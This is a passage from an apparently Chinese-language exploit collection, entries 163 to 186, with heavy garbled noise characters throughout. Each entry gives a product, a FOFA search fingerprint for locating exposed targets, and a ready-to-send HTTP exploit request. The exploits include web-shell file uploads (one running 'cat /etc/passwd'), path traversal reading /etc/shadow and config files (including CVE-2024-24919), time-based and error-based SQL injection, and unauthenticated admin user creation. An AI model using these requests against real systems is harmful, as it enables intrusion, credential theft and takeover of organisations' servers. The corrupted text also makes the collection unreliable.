+ M7 K) j% D% `* M$ ]4 yPOST /QH.aspx HTTP/1.1. v; B: ^" ?* n( l+ Q) x
Host: x.x.x.x
$ g$ Z6 B' M0 d# K' @( ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0/ A' l' n8 t, M* C
Connection: close
' m h: e. i" d5 s4 @Content-Length: 583
. Z% \& ]4 v' W6 I2 q; dContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey& g* @& g8 j5 N4 p! ^8 T
Accept-Encoding: gzip
; E+ X7 ]& t# @6 Z' J4 Y
$ g! Y8 ]# x& T a7 U! s/ K------WebKitFormBoundaryeegvclmyurlotuey: n) c% o- M5 U) W! T% \
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
+ K6 w0 ^5 M( z5 [Content-Type: application/octet-stream H ?0 ?& d/ j
, D& s& O5 ?# O: s1 |7 Z; ^( v<% response.write("ujidwqfuuqjalgkvrpqy") %>
) g6 x" Z9 [" x------WebKitFormBoundaryeegvclmyurlotuey
, v D; N z. x4 q4 UContent-Disposition: form-data; name="action"+ J9 J `7 J9 h9 X% D( O; f
; F2 W" D$ _8 t8 Fupload
# v* m' b) B9 a- ^------WebKitFormBoundaryeegvclmyurlotuey$ O* ?$ l" v" q* n# Z# U
Content-Disposition: form-data; name="responderId"
7 z. ] Z( E# ] r
# J! m3 e1 v! l: F( GResourceNewResponder
0 {! _8 F3 y# M9 X( }------WebKitFormBoundaryeegvclmyurlotuey& n( u% u5 @% S+ ~) M$ w
Content-Disposition: form-data; name="remotePath"
! Y: o, X# w' B3 W6 Z$ p8 c6 w8 A! K: A7 V
/opt/resources. I$ l1 y4 i0 @- T& c3 e& a
------WebKitFormBoundaryeegvclmyurlotuey--
0 w1 C' S# t8 T$ S% A1 g7 L2 }8 L
# v, w. \$ `; |# P) T
[, r$ ?. B' s4 Hhttp://x.x.x.x/opt/resources/kjuhitjgk.aspx
& B- B3 i% S# ]1 N3 A$ b4 b3 R" l7 h" W; p" M
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
3 Q5 P w, t; g2 O( y3 [6 SFOFA: icon_hash="-795291075"
$ e& T) O1 e W% [0 dPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
' `, A8 O0 Y' u; WHost: x.x.x.x c9 h# W% }7 G. [% A2 k1 n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36" ?1 H, k' ]( u. o
Connection: close
) Q% T' T& n# g& x- tContent-Length: 2938 G5 m+ p9 y- [* }0 k) A8 @
Accept: */*9 B9 V* @( \ J5 O1 ~0 ?! [
Accept-Encoding: gzip, deflate
" B) F" s7 R6 H$ tAccept-Language: zh-CN,zh;q=0.9
{" Z8 c1 Q6 I2 kContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod+ N# D, @) e7 y' X
0 _( i5 w+ }+ o6 C" y% V------iiqvnofupvhdyrcoqyuujyetjvqgocod+ m S2 S7 D$ c" v& v
Content-Disposition: form-data; name="name"
0 v7 w" M' [8 }9 C! r
2 j& N" V2 K% ]+ \1.php
+ d2 O; ?4 D) g. ~. O# S- D/ W------iiqvnofupvhdyrcoqyuujyetjvqgocod
1 C7 W8 q" C0 n! U+ m( r+ `) ^4 B% O$ dContent-Disposition: form-data; name="upfile"; filename="1.php"( T" R4 w+ B! b2 a3 q
Content-Type: image/jpeg
$ r6 Z/ r! \5 A6 J! A. a; U9 v- [7 j- \: d! P8 [% H
rvjhvbhwwuooyiioxega. }) w' ~: o& H8 y- b g
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
* J5 |& E; A0 Q& g X
+ O3 B. W; o ~$ I. z
' |, O7 \& t8 O" o- \) Q, V, X; h164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
) u- x4 A4 I$ T7 ^2 [( DFOFA: title="智慧综合管理平台登入"+ i' i9 l7 I$ x2 q# Q- D4 D/ j
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.16 ?8 i& ^: X7 w
Host: x.x.x.x
7 y; w( M) f- i2 ^5 E$ NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0# y. J5 g# j- o1 p3 O
Content-Length: 288, l/ `1 r2 J5 e
Accept: application/json, text/javascript, */*; q=0.01. x }0 i, H* _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,6 q" K- B' E t& z+ P- V0 o
Connection: close
" k" v m1 g9 C5 |, }1 g+ \; p. SContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl; N. K% v! B; t
X-Requested-With: XMLHttpRequest
) P u1 A5 {% V- d0 X9 |8 lAccept-Encoding: gzip
$ M% b3 w* S, I( M8 V: U5 s5 {. s
------dqdaieopnozbkapjacdbdthlvtlyl. h% X( n* d# o- E1 G4 i2 a
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"5 t2 U' |. j0 p, @' }
Content-Type: image/jpeg
+ d- c; R& ~' U* w4 [% j& q8 Y7 K9 y) h l$ i. p
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
. m# H" o# G {" N% W) X------dqdaieopnozbkapjacdbdthlvtlyl--
; P: ?/ B, [5 H0 h3 [* M v Y2 Y3 O$ Y
4 L. Y6 J+ U" U4 t$ ?7 ^http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx4 K6 ?- z+ `1 Q i% M0 j/ A5 e x3 h# n
9 ]& y+ h" z4 l5 L# V9 U( I3 u
165. OrangeHRM 3.3.3 SQL 注入
( Q5 x5 H* t" \1 pCVE-2024-36428
5 ?% T$ l/ T; j0 l6 l' G" h5 Q% yFOFA: app="OrangeHRM-产品"
* `/ e0 J0 ]* r+ i, p7 U6 S# yURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))" E) _+ N4 ~, T, r8 d
1 {2 N& Y' U Q' `- g$ j/ t( D% D
8 k+ `7 b" S+ W7 Z
166. 中成科信票务管理平台SeatMapHandler SQL注入
. k. W, ^/ l- o/ g! u0 E; k0 TFOFA:body="技术支持:北京中成科信科技发展有限公司"
: z" |# A# G/ p; R; g$ U9 KPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1* k% h* s$ X" W. F. O$ k0 |
Host:- w2 F! }' l% |' p
Pragma: no-cache3 E+ K0 A. S( Q
Cache-Control: no-cache
4 l* V7 O5 ]+ K" ?7 Y- o: v KUpgrade-Insecure-Requests: 1
* H6 y9 s. [3 r4 J* D y/ zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36( y8 `7 Z/ i. w8 }2 W- e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 @( b P v. J+ Z2 G8 n! p8 ^Accept-Encoding: gzip, deflate
0 B* `" b: ^" d- L5 W/ J1 ^+ O! yAccept-Language: zh-CN,zh;q=0.9,en;q=0.8- i, q- `0 F) M" `1 D: M
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
+ i' P% N; ?( t5 DConnection: close
6 O3 B* d$ t; WContent-Type: application/x-www-form-urlencoded: R* N+ n0 n7 T3 U7 t" { t
Content-Length: 89( H& ^& F) `! n
. Y2 O' C- R/ H1 s
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
5 ]4 U/ v9 n- P. [* x/ O, A8 h1 U2 R2 K" J
& N7 q. Y# A i- W$ q
167. 精益价值管理系统 DownLoad.aspx任意文件读取
8 [* C4 T, ?9 p" ^9 o! sFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
6 y3 |+ B: \+ RGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
! ?; Z* J0 U# m2 M& Z3 L$ I0 jHost:+ D7 g8 v6 U. l' D) f+ S- T4 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 s, p5 R7 T8 W2 {Content-Type: application/x-www-form-urlencoded3 y2 T5 E2 I2 p0 _9 d
Accept-Encoding: gzip, deflate* H" @* e5 a% ?% K( Q$ D6 ^
Accept: */*& x) u4 n9 G' v9 q1 Y C
Connection: keep-alive1 n5 l6 ]( w/ i8 A. j* P
- n( e- b1 c2 a# l$ \% v- i8 g7 B
: M2 G5 ` x6 X7 e168. 宏景EHR OutputCode 任意文件读取# `( d0 A4 f" ^
FOFA:app="HJSOFT-HCM"$ Z7 W' {4 k5 h7 Q) X
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
7 N! `) M7 a7 D) j zHost: your-ip
) q. G( {9 J: Q, T3 Q/ u6 ^ t) TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36, Z9 ]6 x, r, d" \% f
Content-Type: application/x-www-form-urlencoded
! N) Q4 S2 e# U( R4 v1 I5 fConnection: close0 g# v) `+ K1 x- {% y
1 _3 a! p5 o# C0 L+ ?9 G# J
& I& m8 ]2 s4 C+ C8 Y- H, G, G4 r$ l$ `8 r0 b- X4 D' f- t, ]/ B
169. 宏景EHR downlawbase SQL注入
# w9 K* Q7 D* g7 ]2 kFOFA:app="HJSOFT-HCM"- z" V+ {- `0 I- Z. q
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1" V h, B# P# z
Host: your-ip* A4 D1 v3 W9 x4 i' u* x H7 t5 H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) T4 @9 M% y2 A* J- \
Accept: */*
4 V0 w$ P" P& M+ Z3 l" ~Accept-Encoding: gzip, deflate
* m) ], D: d& Z7 b& m# R7 c Z0 Y ZConnection: close3 W8 T \/ d9 n8 K
9 T V8 B6 x5 D9 u
6 ^ F7 Y) L. A6 l4 H( _' \. e) n$ H- h
170. 宏景EHR DisplayExcelCustomReport 任意文件读取$ n4 V$ G9 B" U9 Z5 w7 r: K R
FOFA:body="/general/sys/hjaxmanage.js"
5 K! R9 Y4 H/ u+ XPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
+ G1 [2 a, A8 F8 kHost: balalanengliang
" }% w e! v E( q+ C- G# JUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& p! u: b* L5 X+ H- Q
Content-Type: application/x-www-form-urlencoded3 I: p1 a9 H" X
5 T. L6 M1 }8 V5 T' xfilename=../webapps/ROOT/WEB-INF/web.xml! ^2 x0 n3 V6 ]4 e1 ~: c
1 e7 b \$ i) X5 w9 g0 @
8 r0 w* y3 c( E; O% b
171. 通天星CMSV6车载定位监控平台 SQL注入 r' m. E5 X9 W$ }1 Z
FOFA:body="/808gps/"' C- u4 T) j2 i1 |; D
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
/ R1 f9 c5 R# p) P% s6 b6 m6 xHost: your-ip
0 M0 n, ~$ B# n0 p: |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
7 v) G0 A$ o! A8 W+ WAccept: */*' N; O7 n4 j. }* o8 _/ R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ o0 D/ l) i* {0 _6 K |+ R
Accept-Encoding: gzip, deflate
! V! e7 [" E; s! J7 CConnection: close# Q8 M0 C T( b/ n" {
1 g" h; [ D. b7 U# V0 X
5 R2 r/ t4 A. P7 A) k- S* D+ y& M: w1 \5 f v" m
172. DT-高清车牌识别摄像机任意文件读取
0 H: _% o2 d9 }$ b) O1 B& TFOFA:app="DT-高清车牌识别摄像机"- i( |8 t& [& r5 U( ^
GET /../../../../etc/passwd HTTP/1.1
& k# E' x/ p Q: u' kHost: your-ip
1 k' W# a" `1 E8 r: p8 }$ QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 M o- V( U! k5 m! I9 M
Accept-Encoding: gzip, deflate5 I( u# C- h9 d1 k" z) O* B' \5 z
Accept: */* W7 b! O% L0 ^4 l+ \2 d) v
Connection: keep-alive9 L# L" c5 v+ G. R, q- a
: ], a; M& a' \) x: b
3 s' W, ~7 s" E; n* a
& i0 a6 \! ]$ B: c173. Check Point 安全网关任意文件读取
/ V- q; p; b1 \: G. SCVE-2024-24919/ U0 R9 M! _& y! Q/ t$ F
FOFA:app="Check_Point-SSL-Network-Extender"
6 N7 V3 ^$ Z9 Q1 oPOST /clients/MyCRL HTTP/1.1
3 m' Z& i: g6 t: d' _( }7 M$ hHost: your-ip
8 w2 ?8 |/ \: {2 fContent-Type: application/x-www-form-urlencoded# v. Q# z2 w' P% h/ T
! z: e- k4 i& i& B9 I
aCSHELL/../../../../../../../etc/shadow2 q: b5 z! L6 ]3 `1 J
1 L/ d& C v9 z- [0 B% p' @; D p+ [4 s4 M! J' [8 o. ?
& o* w4 v9 ~. e' ?0 U. f5 w' `( y174. 金和OA C6 FileDownLoad.aspx 任意文件读取
5 f9 [" s7 k0 uFOFA:app="金和网络-金和OA") Z) \' x5 [7 v
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1, Y7 j+ Q1 |7 m+ R- r/ n p6 W7 i
Host: your-ip6 ?+ z" m' T4 g# a$ t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
! ?% Q6 c w- R# CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% J' A1 R Y$ F6 i4 ]4 lAccept-Encoding: gzip, deflate, br1 d4 A2 q' z, t) Y4 Z$ r. a j
Accept-Language: zh-CN,zh;q=0.9
( G& |- m/ x3 uConnection: close9 J4 m e% C- l" d [' t0 V3 @- t+ P" k
/ Y0 a" r! h) z! X1 |
5 R" W' h8 {! W/ E- k* i0 R
& f6 K1 z, D/ K8 u8 x4 X% o
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入) a1 V( v- z# @3 W/ I- x+ T1 f7 S7 U
FOFA:app="金和网络-金和OA"; v# \, m& D9 `$ k$ q' j0 J f
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1" f; e7 C& f. k7 ]6 S9 `" H9 t8 Y0 E
Host:
2 y6 [+ f; ]6 X1 }2 S, H FUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
, Q5 W ~# y, }, s0 @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, n' j6 R( ~& b, rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' l! |" U. n# p! A" Q0 x. F' F& ?
Accept-Encoding: gzip, deflate; g2 Y. k( n' ?' ?( |
Connection: close0 M9 h6 r$ ?' T% j0 _' W0 N5 J
Upgrade-Insecure-Requests: 1
! K) ]8 _0 D4 }- w! A& S1 P
5 r }8 X( z3 a/ M4 h4 c8 ^1 v2 U+ \
176. 电信网关配置管理系统 rewrite.php 文件上传% ]9 K+ S3 d+ T& q# G0 F% v
FOFA:body="img/login_bg3.png" && body="系统登录"5 v( O5 r& N Z1 ~ s, Z. ?3 O8 g! g
POST /manager/teletext/material/rewrite.php HTTP/1.1
, J; G, I2 k$ ~% ]2 t' MHost: your-ip
, J5 V# q( D4 w3 L- k- C! D2 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.05 d8 g9 `) T. R3 }7 U, F: }
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
( @$ ^/ |! L7 M3 e XConnection: close
) V2 T: N6 O0 q: k- J3 E. e% R G6 ~7 k2 X% m8 n
------WebKitFormBoundaryOKldnDPT) C7 A, K( x# Q5 |* ?
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
! H. w! Z! L; q9 L2 Z! K4 A3 \$ WContent-Type: image/png! e. z6 h' q4 @5 c$ E5 @' h0 `
* e7 U9 c8 y, s$ w( G; l<?php system("cat /etc/passwd");unlink(__FILE__);?>
9 k8 N* k4 @" u- Q# o------WebKitFormBoundaryOKldnDPT
+ m# v( ~. U7 @, J- n, g/ H* RContent-Disposition: form-data; name="uploadtime"
/ N8 P. p) ?: y8 W& {( ]' I2 R
# Y' E0 [: y! }$ c" Q$ c { ) e- U9 O8 Q N9 S/ `
------WebKitFormBoundaryOKldnDPT--
& `1 h6 K$ a) E4 l3 N
, O2 w* I+ p# @) n) M; r- ~4 T7 K z
8 Y( f, L* k: H" Y9 C. I! ?
177. H3C路由器敏感信息泄露+ e/ i4 v: q- r! n. q$ [3 z$ g ?' p
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
6 |; m4 O/ z" E! [4 E/userLogin.asp/../actionpolicy_status/../M60.cfg+ E$ {/ _& b: h& A
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
" _5 C9 Q4 B6 e6 b) ~/userLogin.asp/../actionpolicy_status/../GR5200.cfg, z, k: ~+ b. Y5 y- c# g
/userLogin.asp/../actionpolicy_status/../GR3200.cfg( S( o" |4 h0 A2 {, C3 _5 j
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
$ ?/ ]3 L7 P% q- a3 A/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg8 ]7 e1 x! c, a. ?$ X8 }) ^+ M2 `
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg7 P3 T0 s( D. q- _
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg5 H, g5 ]& {. g3 N6 [
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg+ G, w4 \% `# |! S* P
/userLogin.asp/../actionpolicy_status/../ER5200.cfg$ v" i9 f& J5 g4 y2 ~- Z
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
$ H- w( Z# w6 o: V4 s. j3 b/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg t2 x% U r+ w1 e
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
# i9 Q, O0 C7 R. [1 t/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
3 Q5 ~) q* W5 F9 v/userLogin.asp/../actionpolicy_status/../ER3200.cfg+ X6 }4 s$ z% q0 B: V N
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
: B3 m9 V) f( _8 z9 j& A& v/userLogin.asp/../actionpolicy_status/../ER3108G.cfg. R% A+ G' B- p0 `
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
( ]" d& H4 ]/ |3 l) l- I, p, t/userLogin.asp/../actionpolicy_status/../ER3100.cfg0 }5 `& l+ \6 r! ?' \
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
* u+ Q! N% b. I& V5 _$ N+ g) w/ \: T0 p- n! q+ G- h
5 Z. z1 V3 d6 a& n q( W' D$ b
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
4 F7 H- `. P+ ^! fFOFA:header="/selfservice"
* c5 s4 g1 x6 k) ]+ T2 fPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.13 v i% h) b' w6 A
Host:' r$ |; u$ @7 N1 W& `' _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
' n7 P0 g+ W" W* q+ GContent-Length: 252
% p0 j% n" R" HAccept-Encoding: gzip, deflate
8 a3 i& {9 J- H- ^Connection: close
) c$ z2 R; ?2 {/ {4 n" F3 V" ?" |Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l, O6 ?5 S* B& w$ X
-----------------aqutkea7vvanpqy3rh2l" l8 Q m) y: V# m! ~
Content-Disposition: form-data; name="12234.txt"; filename="12234"
; T& U% f5 N: {. L3 t, D+ EContent-Type: application/octet-stream
6 D7 G: z. N! a# h+ \Content-Length: 255
$ F" @" x% X" Z6 A+ |6 |0 ~% k) W) W! z8 _1 n7 P H
12234
+ j7 E/ u2 h2 S1 L1 ?-----------------aqutkea7vvanpqy3rh2l--
( @& }9 k1 c3 M: x! q8 r& N w; D/ \9 @! l- s
* \% J# q# `* D" @GET /imc/primepush/%2e%2e/flex/12234.txt& k% Z2 F$ o, S Q) `$ X: l
$ h& a; p% ~9 V0 b* s
* q8 A. G- b @1 D9 L179. 建文工程管理系统存在任意文件读取9 ^5 f; l& v$ n$ p4 O$ p; ^8 m, p
POST /Common/DownLoad2.aspx HTTP/1.1- \0 y* S% s- c# r1 D: d- ?
Host: {{Hostname}}
$ `, ?# E3 |' lContent-Type: application/x-www-form-urlencoded) e% d8 y* o0 o! z7 Y9 L
User-Agent: Mozilla/5.0* J) X( k3 m6 J. ~& U
: i- q6 v1 K5 a. a2 a+ [2 O2 h
path=../log4net.config&Name=
( X' s$ w- U8 _, t f
$ O% d# u2 n) f9 F5 i- E3 T m9 q, B; k2 k5 [9 ~
180. 帮管客 CRM jiliyu SQL注入
4 A7 d7 y& I+ r! NFOFA:app="帮管客-CRM"" ]2 h! a {, K- i# Q# o
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1 F1 I: _6 D/ V% T6 }
Host: your-ip+ V! \. ?, d( H+ V% d4 i0 Y. T, c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.360 w* t2 G1 l# W2 Z/ `) K/ m* ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
F7 q& F5 w3 W2 X' H& z8 e/ |Accept-Encoding: gzip, deflate
/ z- K: {! p0 n+ I- ]/ H8 P1 fAccept-Language: zh-CN,zh;q=0.9% ^. z, Q, Z J5 h! ^/ D! W
Connection: close
% |: C. n! n! x7 }, y( Q
: ?: q! L# \6 d5 N5 @ q) _- G3 M7 l& V# W# Y0 b; [6 ?
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
4 d& w% ?: D0 j7 w1 {. X; zFOFA:"PDCA/js/_publicCom.js"
/ |+ X" s. J% M9 s, O4 \POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1) k' t- h, ^% ?' }: M
Host: your-ip8 x$ |9 t9 z# v# ~9 A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36* n, h- D" ?+ R, R- J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 z A$ k" J6 u8 a+ `* v; H( K. A g
Accept-Encoding: gzip, deflate, br
. v) p' L, | U5 P, K* ?Accept-Language: zh-CN,zh;q=0.95 @6 R& \, S& Q: ~
Connection: close
) G( C7 l. G* z) C3 P1 O* eContent-Type: application/x-www-form-urlencoded
$ L% E6 S* m/ a) |$ f$ W0 U; m2 }2 l
" ]; F; o% {' Z! x! j8 |1 P
$ r* d* D ~6 I9 g' Xaction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20- f7 _# a- d# A7 Z
L6 ]9 N2 }3 o/ N! H) i; r2 P( f8 ~; n- j* y- }
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
$ o, [1 s h0 \FOFA:"PDCA/js/_publicCom.js"! O8 W% q% i- D( b9 s! g. D! \
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
" O) |( X$ }( Q3 R( Q6 U! qHost: your-ip* E3 ?# I& G* U. q8 W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
! Q. B* f4 m2 z9 p+ p# @+ [2 m5 s3 eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# V5 L( q5 J' H" H' e9 nAccept-Encoding: gzip, deflate, br
* x$ g9 s, @. W6 [Accept-Language: zh-CN,zh;q=0.9
" `* e, b- o& M4 a; Z3 c2 NConnection: close! t" H7 ^/ g% _
Content-Type: application/x-www-form-urlencoded
. B% Y$ o. z: J) z$ N6 v
; t9 }' s# A* R: Y, ]' D1 k& {. U6 g
username=test1234&pwd=test1234&savedays=10 _* l9 v5 j; [/ T( n4 L
3 ], B( ^' u; { p, @- x
* b5 O$ ] T, G+ {
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入) I" V3 B" w$ S0 l L% l! T% ^7 Q
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面", z4 O8 b$ M9 W' ^7 z
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
: o1 Q0 P' ]4 W2 E6 b. nHost: your-ip
. @* C0 a3 }# EUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.364 \6 U- y8 w) _0 m+ K! a
Accept-Charset: utf-8. g4 Z6 x8 @: w: r' Y* ~
Accept-Encoding: gzip, deflate0 w: t; C" M3 |* `$ {% g9 K
Connection: close7 l. e& Z6 } k& c+ R% e
: J+ H! o. m- `) E+ K' H
# y" e/ S V& O184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
& b3 k/ B: ?+ u1 C, VFOFA:server="SunFull-Webs"/ ^7 x5 w. ^% y" m! n* L
POST /soap/AddUser HTTP/1.1
, v( f1 ?: V" K! W. h# r6 pHost: your-ip
! v; o" Q+ {5 {! ^Accept-Encoding: gzip, deflate
6 J6 v& ^% R Z4 j( o3 h, OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
' z- n4 V1 I2 ]% m! g: vAccept: application/xml, text/xml, */*; q=0.01
/ ~8 u9 g6 ~- R# `' tContent-Type: text/xml; charset=utf-8
( ]/ {" h; R& U- \/ e; eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 f6 V) U* H5 f- W: i, EX-Requested-With: XMLHttpRequest# Y: ~$ e: h% K+ |( ~
: d: ]8 {" {; J; z: @
2 L* D8 j" Z- |! j: C) A
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')5 d' X6 L! \" c' B- v# V! \
8 E! g7 `3 {+ |( O, X6 }) p' R; C
9 M# J$ r# w& T+ F( E/ y185. 瑞友天翼应用虚拟化系统SQL注入4 c4 C% o$ ~0 n- h6 S; F2 E9 @& p
version < 7.0.5.1- w5 D* ^0 T. h- O
FOFA:app="REALOR-天翼应用虚拟化系统"
0 }9 r4 T' F$ l9 `! e' jGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
, |- e- c* n( n" \2 T% X; @Host: host
" Q5 r, n+ X7 i6 c+ `2 y& N+ f6 o3 H) |. J1 Y B
0 z `1 O; ? W2 \* K. O! p186. F-logic DataCube3 SQL注入, r, i! A) h* z' B: ?% x
CVE-2024-31750
& d, @8 |" v7 q' O% W! \$ dF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
$ W# K% {+ J) ^2 ]9 D9 h! IFOFA:title=="DataCube3"
